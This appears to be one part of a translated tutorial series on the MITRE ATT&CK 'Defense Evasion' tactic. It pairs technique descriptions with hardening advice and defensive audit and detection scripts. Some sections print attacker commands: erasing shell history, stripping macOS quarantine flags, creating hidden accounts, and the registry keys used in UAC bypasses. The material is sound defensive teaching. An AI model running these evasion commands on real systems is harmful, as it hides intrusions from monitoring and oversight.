We study Adversarial Tactics, Techniques & Common Knowledge (ATT&CK). Enterprise Tactics. Part 5

    Defense Evasion

    Links to all parts:
    Part 1. Obtaining initial access (Initial Access)
    Part 2. Execution (Execution)
    Part 3. Persistence
    Part 4. Privilege Escalation
    Part 5. Defense Evasion
    Part 6. Obtaining credentials (Credential Access)
    Part 7. Discovery (Discovery)
    Part 8. Lateral Movement

    The Defense Evasion section describes techniques an adversary uses to hide malicious activity and avoid detection by security controls. It also includes variations of techniques from other stages of the attack chain that specifically serve to overcome a particular defense or preventive measure of the defending side; defense evasion techniques are therefore used at every phase of an attack.

    The author is not responsible for any consequences of applying the information in this article, and apologizes in advance for possible inaccuracies in some wordings and terms. The published information is a free retelling of MITRE ATT&CK content.

    Access Token Manipulation

    System: Windows
    Permissions: User, Administrator
    Description: Adversaries use access tokens to perform their actions in the security context of a different user or of the system, so that malicious activity does not stand out. Using Windows API functions, an adversary can copy access tokens from existing processes (token stealing); this requires running in the context of a privileged user (for example, an administrator). Token theft is typically used to elevate from administrator level to SYSTEM level. An adversary can also use an account's access token to authenticate to a remote system if the account has the necessary permissions there. There are three main ways to abuse access tokens.

    Token theft and impersonation.
    Impersonation is the ability of the OS to run a thread in a security context other than that of the process the thread belongs to; in other words, it lets code act on behalf of another user. An adversary can duplicate an existing access token with the DuplicateTokenEx function and then either call ImpersonateLoggedOnUser so that the calling thread runs in the context of the logged-on user, or call SetThreadToken to assign the token to a thread.

    Creating a process with an access token.
    An adversary can duplicate a token with DuplicateTokenEx and pass it to CreateProcessWithTokenW to create a new process that runs in the context of the impersonated user.

    Obtaining and impersonating a token from credentials.
    An adversary who has a user name and password can create a new logon session with the LogonUser API function, which returns a copy of that session's access token, and then assign the token to a thread with SetThreadToken.
    Metasploit Meterpreter and Cobalt Strike include tools for manipulating access tokens to elevate privileges.

    Protection recommendations: To use the token-stealing variants described above, an adversary already needs administrator rights on the host, so do not forget to limit the privileges of ordinary users. Note that any user can obtain and impersonate a token via LogonUser if they hold valid credentials. Restrict which users and groups may create access tokens:

    GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object.

    Also restrict who can replace the token of a process (by default only LOCAL SERVICE and NETWORK SERVICE hold this right):
    GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Replace a process level token.
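    The two user-rights assignments above correspond to the privileges SeCreateTokenPrivilege and SeAssignPrimaryTokenPrivilege, and their effective holders can be read from a `secedit /export /cfg` dump. The following script is an added example (not code from the article): it parses such a dump and reports any account holding these privileges, or SeDebugPrivilege, beyond the default holders. The dump embedded in it is constructed, and the S-1-5-21-... SIDs are made up.

```python
"""Audit token-related user rights in a `secedit /export /cfg <file>` dump.

Added example, not from the article. SAMPLE_EXPORT is a constructed excerpt of
such a dump; the S-1-5-21-... SIDs in it are made up. On a real host run
`secedit /export /cfg C:\\sec.inf` and read the file with encoding="utf-16".
"""
import configparser

# Holders of each privilege on a default Windows installation.
# SeCreateTokenPrivilege ("Create a token object"): nobody.
# SeAssignPrimaryTokenPrivilege ("Replace a process level token"):
#     LOCAL SERVICE (S-1-5-19) and NETWORK SERVICE (S-1-5-20).
# SeDebugPrivilege ("Debug programs", needed to steal tokens from SYSTEM
#     processes): Administrators (S-1-5-32-544).
DEFAULT_HOLDERS = {
    "SeCreateTokenPrivilege": frozenset(),
    "SeAssignPrimaryTokenPrivilege": frozenset({"S-1-5-19", "S-1-5-20"}),
    "SeDebugPrivilege": frozenset({"S-1-5-32-544"}),
}

SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1111-2222-3333-1105
SeCreateTokenPrivilege = *S-1-5-21-1111-2222-3333-1001
SeDebugPrivilege = *S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(text):
    """Return {privilege: set of holders} from the [Privilege Rights] section.

    secedit writes holders as comma-separated '*SID' tokens; the leading '*'
    is stripped so the values compare directly with DEFAULT_HOLDERS.
    """
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None)
    cp.optionxform = str  # keep privilege names case-sensitive
    cp.read_string(text)
    rights = {}
    for name, value in cp["Privilege Rights"].items():
        holders = {h.strip().lstrip("*") for h in value.split(",") if h.strip()}
        rights[name] = holders
    return rights


def find_extra_holders(rights):
    """Map each audited privilege to the holders it has beyond the defaults."""
    findings = {}
    for priv, defaults in DEFAULT_HOLDERS.items():
        extra = rights.get(priv, set()) - defaults
        if extra:
            findings[priv] = sorted(extra)
    return findings


if __name__ == "__main__":
    for priv, extra in find_extra_holders(parse_privilege_rights(SAMPLE_EXPORT)).items():
        print(f"{priv}: unexpected holders {', '.join(extra)}")
```

    Unresolved SIDs in the report can be mapped to names with `wmic useraccount where sid='...' get name` or PowerShell's `SecurityIdentifier.Translate`; a service account legitimately holding SeAssignPrimaryTokenPrivilege is common, an interactive user holding SeCreateTokenPrivilege is not.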

    BITS Jobs

    System: Windows
    Permissions: User, Administrator, SYSTEM
    Description: Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through the Component Object Model (COM). BITS is typically used by updaters, instant messengers and other applications that prefer to work in the background without disrupting other network applications. File transfers are represented as BITS jobs, each containing a queue of one or more file operations. The interface for creating and managing BITS jobs is available in PowerShell (the BitsTransfer module) and in the BITSAdmin tool. Adversaries can use BITS to download, execute and clean up after running malicious code. BITS jobs are persisted in the BITS job database rather than as new files or registry entries, they survive reboots, and BITS traffic is usually permitted by host firewalls.

    Protection recommendations: BITS is standard OS functionality whose use is hard to distinguish from malicious activity, so defensive effort should focus on preventing the adversary's tooling from running at the start of the attack chain. Disabling BITS entirely would break updates of legitimate software, but consider restricting access to the BITS interface to specific users and groups, and limit the lifetime of BITS jobs with the following registry values (set by the corresponding BITS Group Policy settings):

    • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS\JobInactivityTimeout (in days);
    • HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS\MaxDownloadTime (in seconds).

    Existing jobs of all users can be enumerated for review with bitsadmin /list /allusers /verbose or Get-BitsTransfer -AllUsers.

    Binary Padding

    System: Windows, Linux, macOS
    Description: Some security tools scan files by matching static signatures. Adversaries can append junk data to a malicious file either to push its size above the maximum file size the scanner will inspect, or simply to change the file's hash so that hash-based blocklists of forbidden executables no longer match it. The padding does not change the program's behaviour.

    Protection recommendations: Identify potentially dangerous software with application whitelisting tools such as AppLocker and software restriction policies; prefer publisher or path rules over hash rules, which a single appended byte defeats.
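    Padding is appended behind the last section of a PE file, so it shows up as a large "overlay" when the declared section layout is compared with the file size, and a hash over the declared body alone is stable while the whole-file hash changes. The script below is an added example (not from the article): it builds a hand-constructed PE skeleton, pads it the way an adversary would, and measures the overlay. The skeleton contains no runnable code and exists only to make the offset arithmetic checkable.

```python
"""Measure the data appended behind a PE file's last section (its "overlay").

Added example, not from the article. build_minimal_pe() constructs a PE
skeleton by hand (DOS header, PE signature, COFF header, one section header,
raw section data); it contains no runnable code and exists only so the offset
arithmetic can be shown on a known layout.
"""
import hashlib
import struct


def build_minimal_pe(section_data):
    """Constructed single-section PE image; all header fields are the bare minimum."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0 here), Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0x0022)
    raw_ptr = e_lfanew + 4 + 20 + 40      # section data starts right after the headers
    # Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
    # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
    # NumberOfLinenumbers, Characteristics
    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                          len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos_header + b"PE\0\0" + coff + section + section_data


def pe_overlay_offset(data):
    """File offset where the last section's raw data ends; anything after it is overlay."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_header_size = struct.unpack_from("<H", data, coff + 16)[0]
    first_section = coff + 20 + opt_header_size
    end = first_section + 40 * num_sections
    for i in range(num_sections):
        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20 of each header
        raw_size, raw_ptr = struct.unpack_from("<II", data, first_section + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def pad_file(data, target_size, filler=b"\0"):
    """What the adversary does: append filler until the file reaches target_size bytes."""
    return data + filler * max(0, target_size - len(data))


def analyze(data):
    """Hashes plus overlay statistics; body_sha256 ignores anything appended."""
    end = pe_overlay_offset(data)
    overlay = data[end:]
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "body_sha256": hashlib.sha256(data[:end]).hexdigest(),
        "overlay_bytes": len(overlay),
        "overlay_zero_fraction": overlay.count(b"\0") / len(overlay) if overlay else 0.0,
    }


if __name__ == "__main__":
    original = build_minimal_pe(b"\x90" * 64)
    padded = pad_file(original, 64 * 1024)
    for label, blob in (("original", original), ("padded", padded)):
        print(label, analyze(blob))
```

    A large overlay is a hint, not a verdict: installers, self-extracting archives and Authenticode-signed binaries legitimately carry data behind the last section, so combine the overlay size with its content (a run of zeros or of a repeated byte is far more suspicious than a signature blob) and with the body hash, which is the value worth putting on a blocklist.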

    Bypass User Account Control

    System: Windows
    Permissions: User, Administrator
    Description: There are many ways to bypass UAC, the most common of which are implemented in the UACMe project. New UAC bypasses are found regularly, such as the abuse of the eventvwr.exe system application, which can be made to run a binary or script with elevated privileges. Malicious code can also be injected into trusted processes that UAC auto-elevates without prompting the user.

    The eventvwr.exe bypass modifies the following registry key:
    HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command

    The sdclt.exe bypass modifies the following keys:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe;
    HKEY_CURRENT_USER\Software\Classes\exefile\shell\runas\command (the IsolatedCommand value).

    Both rely on the fact that an auto-elevated process looks up its handler under HKEY_CURRENT_USER, which the non-elevated user can write to, before HKEY_LOCAL_MACHINE.

    Security tips: Remove users from the local Administrators group on protected systems. Where possible, set UAC to its highest level (Always notify); the silent auto-elevation these bypasses depend on applies only at the lower levels.

    CMSTP (AppLocker Bypass - CMSTP)

    System: Windows
    Permissions: User
    Description: cmstp.exe, the Microsoft Connection Manager Profile Installer, is built into Windows and accepts an INF file as a parameter. An adversary can craft a malicious INF that makes cmstp.exe load and execute DLLs or scriptlets (*.sct) from remote servers, bypassing AppLocker and similar blocks, because cmstp.exe is signed by Microsoft and lives in the system directory.

    Protection recommendations: Block the execution of potentially dangerous applications. Monitor or completely block launches of C:\Windows\System32\cmstp.exe, paying particular attention to INF paths that point to user-writable or remote locations.

    Clear Command History

    System: Linux, macOS
    Permissions: User
    Description: For the user's convenience, the commands executed in an interactive shell on macOS and Linux are recorded, so that a command run earlier, even in another session, can quickly be repeated. During the session bash keeps the history in memory; when the user logs out it is written to the file named by the HISTFILE variable, which defaults to ~/.bash_history in the user's home directory. The history file may also contain passwords that the user typed on the command line in clear text. Adversaries may search command history files for passwords, or take steps to keep their own activity out of the history, for example:

    unset HISTFILE
    export HISTFILESIZE=0
    history -c
    rm ~/.bash_history

    Security tips: Preventing users from deleting or rewriting the .bash_history file (for example by making it append-only) limits an adversary's ability to misuse it, and preventing users from changing the HISTFILE and HISTFILESIZE variables helps ensure that the command log is actually written. Central collection of shell activity (auditd, process accounting) does not depend on the per-user history at all.

    Code Signing

    System: Windows, macOS
    Description: A digital signature on code authenticates the developer and guarantees that the file has not been modified. Adversaries, however, can use signatures to disguise malware as legitimate binaries: code-signing certificates can be created, forged or stolen. Code signing to verify software on first run is used on modern Windows and macOS / OS X systems, and is not used on Linux because of the decentralized nature of the platform. A valid code-signing certificate can be used to bypass security policies that require only signed code to run on the system.

    Protection recommendations: Application whitelisting that pins trusted publishers (for example AppLocker publisher rules), rather than merely requiring that some valid signature be present, prevents code signed with an unknown or stolen certificate from running on protected systems.

    Component Firmware

    System: Windows
    Permissions: SYSTEM
    Description: Some adversaries use sophisticated tools to compromise computer components and install malicious firmware on them, so that malicious code runs outside the operating system and even outside the main system firmware (BIOS). The technique targets firmware of components that have no built-in integrity checking, for example hard drives. A device with malicious firmware can give persistent access to the compromised system that survives OS reinstallation and even overwriting of the hard disk. The technique is designed to defeat software-based protection and integrity controls.

    Component Object Model Hijacking

    System: Windows
    Permissions: User
    Description: Microsoft Component Object Model (COM) is a technology for building software from interacting object components, each of which can be used by many programs at once. Adversaries can hijack COM so that their malicious code runs in place of legitimate code. To hijack a COM object, the reference to a legitimate system component in the Windows registry is replaced with a reference to the malicious one; because per-user registrations under HKEY_CURRENT_USER\Software\Classes are consulted before the machine-wide ones under HKEY_LOCAL_MACHINE, an unprivileged user can do this. The next time the component is called, the malicious code executes.

    Protection recommendations: Preventive blocking is not recommended, because COM objects are part of the OS and of the software installed on it; locking down changes to COM objects can affect the stability of the operating system and applications. Direct defensive effort instead at blocking malicious and potentially dangerous software, and audit per-user CLSID registrations that shadow a machine-wide entry or point to unusual paths.

    Control Panel Items

    System: Windows
    Permissions: User, Administrator, SYSTEM
    Description: Adversaries use Windows Control Panel items to execute arbitrary commands as a payload (the Reaver malware is an example). Malicious objects can be disguised as standard Control Panel items and delivered by phishing attachments. Utilities for viewing and configuring Windows settings are registered EXE files and CPL files of Control Panel items. CPL files are essentially renamed DLLs that can be executed in the following ways:

    • directly from the command line: control.exe <file.cpl>;
    • via an API function exported by shell32.dll: rundll32.exe shell32.dll,Control_RunDLL <file.cpl>;
    • by double-clicking the .cpl file.

    Registered CPLs stored in System32 are automatically shown in the Windows Control Panel and have a unique identifier stored in the registry:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace

    Information about other CPLs, such as the display name and the path to the .cpl file, is stored in the "Cpls" and "Extended Properties" subkeys of:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel

    Some CPLs launched via the shell are registered under:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers

    Protection recommendations: Restrict the execution and storage of Control Panel files to protected folders only (for example C:\Windows\System32), and use User Account Control (UAC) and AppLocker to prevent unauthorized changes to the system. Anti-virus software remains relevant, since a CPL is scanned like any other DLL.


    DCShadow

    System: Windows
    Permissions: Administrator
    Description: DCShadow registers a rogue domain controller in the attacked network, through which an adversary can change AD data, including any domain object, credentials and keys, while staying invisible to a SIEM that only watches the legitimate DCs. The toolkit for the attack is part of mimikatz. DCShadow can be used to carry out a SID-History injection attack and to plant backdoors for further persistence in the domain.

    Protection recommendations: Since DCShadow abuses AD's own design (the rogue host registers itself as a replication source and pushes its changes through the normal replication protocol), defensive effort should focus on preventing the attack tooling from running. The attack can be detected by analyzing directory replication traffic: replication normally runs only between legitimate DCs on the replication schedule, whereas DCShadow triggers it out of schedule and involves a host that is not a DC, and the rogue DC's computer object briefly appears with DC-like attributes in AD.
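    The replication traffic referred to above is the drsuapi RPC interface, so a network sensor that decodes DCE/RPC can flag any drsuapi call where one endpoint is not a known DC. The script below is an added example (not from the article) of that check over a constructed set of call records; the interface UUID and opnums are those of the MS-DRSR specification, the IP addresses and DC inventory are assumed.

```python
"""Flag directory-replication RPC calls that involve a host which is not a known DC.

Added example, not from the article. The call records below are constructed; on a
real network they would come from an RPC-aware network sensor. The interface UUID
and opnums are those of the MS-DRSR (drsuapi) interface.
"""

DRSUAPI_UUID = "e3514235-4b06-11d1-ab04-00c04fc2dcd2"

# MS-DRSR opnums worth alerting on when a non-DC is involved:
#   3  IDL_DRSGetNCChanges  pulls directory changes (what DCSync asks for, and what a
#                           legitimate DC calls against the rogue DC during DCShadow)
#   5  IDL_DRSReplicaAdd    adds a replication source (the rogue DC registers itself)
#  17  IDL_DRSAddEntry      adds objects such as the rogue DC's nTDSDSA object
OPNAMES = {3: "DRSGetNCChanges", 5: "DRSReplicaAdd", 17: "DRSAddEntry"}

KNOWN_DCS = {"10.0.0.10", "10.0.0.11"}          # assumed inventory of legitimate DCs

# (src_ip, dst_ip, rpc_interface_uuid, opnum) -- constructed sample
CALLS = [
    ("10.0.0.11", "10.0.0.10", DRSUAPI_UUID, 3),   # DC-to-DC replication: normal
    ("10.0.0.57", "10.0.0.10", DRSUAPI_UUID, 3),   # workstation pulling changes
    ("10.0.0.57", "10.0.0.10", DRSUAPI_UUID, 5),   # workstation registering as a replica source
    ("10.0.0.10", "10.0.0.57", DRSUAPI_UUID, 3),   # legitimate DC pulling from the workstation
    ("10.0.0.57", "10.0.0.10", "00000000-0000-0000-0000-00000000beef", 0),  # some other interface
]


def suspicious_replication(calls, known_dcs):
    """drsuapi calls where either endpoint is not a known DC, as (src, dst, op) tuples."""
    findings = []
    for src, dst, interface, opnum in calls:
        if interface.lower() != DRSUAPI_UUID:
            continue
        if src in known_dcs and dst in known_dcs:
            continue                                  # DC <-> DC traffic is expected
        findings.append((src, dst, OPNAMES.get(opnum, f"opnum {opnum}")))
    return findings


if __name__ == "__main__":
    for src, dst, op in suspicious_replication(CALLS, KNOWN_DCS):
        print(f"drsuapi {op} between non-DC endpoint(s): {src} -> {dst}")
```

    The check deliberately fires on both directions: the rogue host calling the real DC (DRSReplicaAdd, or GetNCChanges in a DCSync) and the real DC calling the rogue host (GetNCChanges during the DCShadow push). Keep the DC inventory current, since a freshly promoted DC would otherwise produce a burst of false positives.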

    DLL Search Order Hijacking

    System: Windows
    Permissions: User, Administrator, SYSTEM
    Description: The technique exploits weaknesses in the algorithm that applications use to find the DLLs they need (see Microsoft Security Advisory 2269637). The directory of the program itself is searched first, and in the legacy configuration the current working directory is searched before the system directories, so an adversary who can write to such a directory can plant a malicious DLL with the same file name as the one the program expects.

    Remote variants are possible when the program's current directory points to a remote location such as a network share. Adversaries can also change how DLLs are looked up and loaded by replacing the .manifest or .local files that describe the DLL search parameters of an application. If the targeted program runs with high privileges, the malicious DLL it loads executes with the same rights, so the technique can also be used to escalate from user to administrator or SYSTEM.

    Protection recommendations: Disallow loading of DLLs from remote locations (the CWDIllegalInDllSearch setting; it is built into Windows Server 2012 and later and available as an update for Windows XP and later and Server 2003 and later). Enable Safe DLL search mode, which moves the current working directory behind the system directories (%SYSTEMROOT%\System32, %SYSTEMROOT%) in the search order.

    Enable Safe DLL search mode:
    Computer Configuration > [Policies] > Administrative Templates > MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode.
    The corresponding registry value is
    HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode (REG_DWORD, 1 = enabled; this is the default on supported Windows versions).

    Consider auditing protected systems for DLL search weaknesses with tools such as the PowerUp module of PowerSploit. Also block malicious and potentially dangerous software and implement Microsoft's recommendations on the subject.
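    The effect of SafeDllSearchMode is easiest to see by replaying the loader's search order against a known set of files. The script below is an added example (not from the article) that models the documented standard search order for a DLL that is neither already loaded nor a KnownDLL; the application path, the network-share current directory and the DLL name helper.dll are assumptions for illustration (helper.dll is not a real system DLL).

```python
"""Model the Windows DLL search order with Safe DLL search mode on and off.

Added example, not from the article. The application, directories and the DLL
name "helper.dll" are assumptions for illustration (helper.dll is not a real
system DLL). The order follows the documented standard search order for DLLs
that are neither already loaded nor listed in KnownDLLs.
"""
from pathlib import PureWindowsPath

SYSTEM_DIR = r"C:\Windows\System32"
SYSTEM16_DIR = r"C:\Windows\System"
WINDOWS_DIR = r"C:\Windows"

APP_DIR = r"C:\Program Files\App"          # assumed, not writable by the user
CWD = r"\\fileserver\public"               # assumed current directory: a network share
PATH_DIRS = [r"C:\Windows\System32", r"C:\Tools"]


def dll_search_order(app_dir, cwd, path_dirs, safe_mode=True):
    """Directories probed in order; safe mode moves the current directory behind
    the system directories, legacy (unsafe) mode probes it second."""
    if safe_mode:
        order = [app_dir, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR, cwd]
    else:
        order = [app_dir, cwd, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR]
    return order + list(path_dirs)


def resolve(dll_name, present_files, safe_mode, app_dir=APP_DIR, cwd=CWD):
    """Return the first path the loader would pick for dll_name given the files that exist."""
    existing = {p.lower() for p in present_files}
    for directory in dll_search_order(app_dir, cwd, PATH_DIRS, safe_mode):
        candidate = str(PureWindowsPath(directory) / dll_name)
        if candidate.lower() in existing:
            return candidate
    return None


# Constructed file system state: the genuine DLL in System32 and attacker copies elsewhere
GENUINE = r"C:\Windows\System32\helper.dll"
PLANTED_ON_SHARE = r"\\fileserver\public\helper.dll"
PLANTED_IN_APP_DIR = r"C:\Program Files\App\helper.dll"


if __name__ == "__main__":
    files = {GENUINE, PLANTED_ON_SHARE}
    print("safe mode   :", resolve("helper.dll", files, safe_mode=True))
    print("legacy mode :", resolve("helper.dll", files, safe_mode=False))
    # A writable application directory defeats safe mode: it is always searched first
    print("app dir     :", resolve("helper.dll", files | {PLANTED_IN_APP_DIR}, safe_mode=True))
```

    The third case is the one SafeDllSearchMode cannot fix: the application directory is always first, so an installer that leaves it user-writable is a hijack waiting to happen regardless of policy. Note that SetDllDirectory and the LOAD_LIBRARY_SEARCH_* flags let an application change this order for itself, and that a fully qualified path in LoadLibrary bypasses the search entirely.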

    DLL Side-Loading

    System: Windows
    Description: The attack exploits weaknesses of the Windows side-by-side (WinSxS or SxS) assembly technology, whose purpose is to let applications run with incompatible versions of the same code components. The component assembly store is in the C:\Windows\WinSxS folder. Each assembly must have an associated manifest, an XML file describing the files, classes, interfaces, libraries and other elements of the assembly. As with DLL search order hijacking, adversaries can get a legitimate application to "side-load" a malicious DLL when the manifest does not identify the required DLL precisely enough, by placing the attacker-controlled assembly where the manifest will resolve it, for example under a path such as %TEMP%\RarSFX%\%ALLUSERSPROFILE%\WinSxS.

    Security recommendations: Update software regularly and install applications into write-protected directories. Use sxstrace.exe to trace side-by-side activation and check manifest files for side-loading weaknesses.

    Deobfuscate / Decode Files or Information

    System: Windows
    Permissions: User
    Description: Adversaries obfuscate files and information to hide malicious code and the artifacts left by an intrusion. To use such files they later reverse the process and deobfuscate or decode them. This may be done by the malware itself, by scripts or by system utilities; a well-known example is using the certutil utility to decode an executable of a remote access tool hidden inside a certificate file. Another example is using the copy /b command to concatenate binary fragments into a malicious payload.

    Payload files may be compressed, archived or encrypted to avoid detection. Sometimes user action (User Execution) is required for the deobfuscation or decryption, for example entering a password to open a compressed or encrypted file or script with malicious content.

    Security tips: Identify and block unnecessary system utilities or potentially dangerous software that can be used to deobfuscate or decrypt files, using tools such as AppLocker and software restriction policies. Where certutil cannot be blocked, monitor its use with the -decode and -urlcache options.

    Disabling Security Tools

    System: Windows, Linux, macOS
    Description: Adversaries may disable security tools, kill event-logging processes, delete their registry keys, prevent security tools from starting while malicious activity takes place, or otherwise interfere with security scanners and event reporting.

    Security tips: Make sure that permissions on the processes, registry keys and files of security tools are configured so that they cannot be stopped, modified or removed without authorization, and alert when an agent's heartbeat goes silent.

    Exploitation for Defense Evasion

    System: Windows, Linux, macOS
    Permissions: User
    Description: Like any software, security products may contain vulnerabilities that an adversary can exploit to disable or bypass them.

    Protection recommendations: Update software regularly and develop and implement a software vulnerability management process. Virtualization and application micro-segmentation can reduce the risk posed by exploitation of such vulnerabilities.

    Extra Window Memory Injection

    System: Windows
    Permissions: Administrator, SYSTEM
    Description: The technique abuses the Extra Window Memory (EWM) that a window class can request for each of its windows. The EWM is up to 40 bytes, enough to hold a 32-bit pointer, and is often used to store pointers to procedures. During the attack chain malware can write a pointer to malicious code into the EWM of another process's window, after which that process executes the code when the pointer is invoked.

    Protection recommendations: Since EWM injection abuses features of the OS design, protection efforts should be directed at preventing malicious programs and tools from running. Identifying and blocking potentially dangerous software with AppLocker, application whitelisting or Software Restriction Policies is good practice.

    File Deletion

    System: Windows, Linux, macOS
    Permissions: User
    Description: Tools, malware and other files used by an adversary may leave traces of the intrusion on the system. Adversaries may delete these artifacts during the intrusion to reduce the chance of detection, or at the end of their operation. Both specialised secure-deletion tools (for example Windows Sysinternals SDelete) and utilities built into the OS, such as del and cipher /w, can be used.

    Protection recommendations: Where possible, block the execution of unnecessary system utilities, third-party tools and potentially dangerous software that can be used to destroy files.

    File System Logical Offsets

    System: Windows
    Permissions: Administrator
    Description: Windows allows programs to open logical volumes directly. A program with such access can read and write files straight from the disk by parsing the file system's data structures itself, bypassing file access controls and file system monitoring. The NinjaCopy PowerShell script, for example, uses this to copy files that are locked or protected, such as the SAM hive or NTDS.dit.

    Protection recommendations: Block potentially dangerous software, and monitor handles opened to raw volume devices (\\.\C:) by processes that are not backup or disk-management tools.

    Gatekeeper Bypass

    System: macOS
    Permissions: User, Administrator
    Description: macOS and OS X use the Gatekeeper technology to ensure that only trusted software runs. When an application is downloaded from the Internet, the downloading application sets the extended attribute com.apple.quarantine on the file, which tells Gatekeeper to ask the user for permission before executing it. The flag is set before the file is saved to disk; when the user then tries to open the file, Gatekeeper checks for the attribute and, if present, the system prompts the user to confirm the launch and shows the URL the file was downloaded from. Applications that arrive on the system from a USB flash drive, optical disc, external hard drive or network share do not get the quarantine flag. Some utilities and files dropped during a drive-by compromise likewise do not get the flag, and thus bypass the Gatekeeper check. Whether the attribute is present can be checked with the command: xattr /path/to/MyApp.app

    The flag can also be removed with xattr; for files the user does not own this requires elevated privileges:
    sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app

    Protection recommendations: In addition to Gatekeeper, restrict execution to applications obtained from the App Store.

    HISTCONTROL

    System: Linux, macOS
    Permissions: User
    Description: The HISTCONTROL environment variable is a colon-separated list of options controlling which commands are kept in the history that is written to ~/.bash_history when the user logs out. For example, the ignorespace option means that lines beginning with a space are not saved, and ignoredups means that a command identical to the previous one is not saved. On some Linux systems the default is ignoreboth, which combines the two. This means that the command " ls" (with a leading space) will not be saved in the history, whereas "ls" will.

    HISTCONTROL is not set by default on macOS, but the user can configure it. Adversaries can use this behaviour to leave no trace of their activity simply by prefixing their commands with a space.

    Security tips: Prevent users from changing the HISTCONTROL variable, and make sure it is set to ignoredups rather than ignoreboth or ignorespace.

    Hidden Files and Directories

    System: Windows, Linux, macOS
    Permissions: User
    Description: On Windows users can hide files with the attrib command: attrib +h <file name> hides the file, +s marks it as a system file, and the /S switch applies the change recursively. On Linux and macOS users can hide files and directories simply by starting the name with a "."; such files and directories are then hidden from Finder and from utilities such as ls (unless ls -a is used).

    On macOS files can also be marked with the UF_HIDDEN flag (chflags hidden), which hides them from Finder.app but does not prevent them from being seen in Terminal.app. Many applications create hidden files and folders so as not to clutter the user's workspace; for example, SSH tools create a hidden .ssh directory that stores the list of known hosts and the user's keys.

    Adversaries use the ability to hide files and folders to avoid attracting the attention of users.

    Protection recommendations: Preventing this technique is difficult because hiding files is a normal OS feature; instead, make sure scanning and inventory tools include hidden entries, and alert on executables or scripts that are hidden in user-writable locations.

    Hidden Users

    System: macOS
    Permissions: Administrator, root
    Description: Each account in macOS has a UniqueID that can be specified when the user is created. The /Library/Preferences/com.apple.loginwindow property list has a Hide500Users option that hides users with IDs of 500 and lower from the login screen. By creating a user with an ID below 500 and enabling Hide500Users, an adversary can hide his accounts:

    sudo dscl . -create /Users/username UniqueID 401
    sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool TRUE

    Protection recommendations: If the system is domain-joined, group policy can restrict the ability to create and hide users. Similarly, preventing modification of /Library/Preferences/com.apple.loginwindow keeps all users visible. As a check, list local accounts with dscl . -list /Users UniqueID and compare the result with what the login screen shows.

    Hidden Window

    System: macOS
    Permissions: User
    Description: On macOS and OS X, application launch options are listed in plist property files. One of the keys in these files, apple.awt.UIElement, hides a Java application's icon from the Dock. The key is normally used by applications that live in the menu bar, but adversaries can abuse it to hide malicious applications.

    Security tips: Monitor the list of programs whose plist sets apple.awt.UIElement (and the analogous LSUIElement key for native applications).

    Image File Execution Options Injection

    System: Windows
    Permissions: Administrator, SYSTEM
    Description: The Image File Execution Options (IFEO) mechanism lets a developer register a debugger that is started instead of a program, by creating a subkey named after the program's executable and setting a Debugger value in it:

    • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[executable]
    • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[executable], where [executable] is the file name of the program being intercepted and the Debugger value holds the command line of the debugger.

    Like other injections, the Debugger value can be abused to run arbitrary code for privilege escalation or persistence. Malware also uses IFEO for defense evasion by registering "debuggers" that redirect or simply prevent the start of system and security applications (a Debugger pointing to a non-existent program makes the target fail to launch).

    Protection recommendations: The technique abuses a standard OS developer feature, so blanket restrictions may destabilise legitimate software, including security products that use IFEO themselves. Efforts to prevent IFEO injection should focus on earlier stages of the attack chain. The attack can be detected by monitoring for processes created with the DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS flags, and by auditing Debugger values under the IFEO keys.
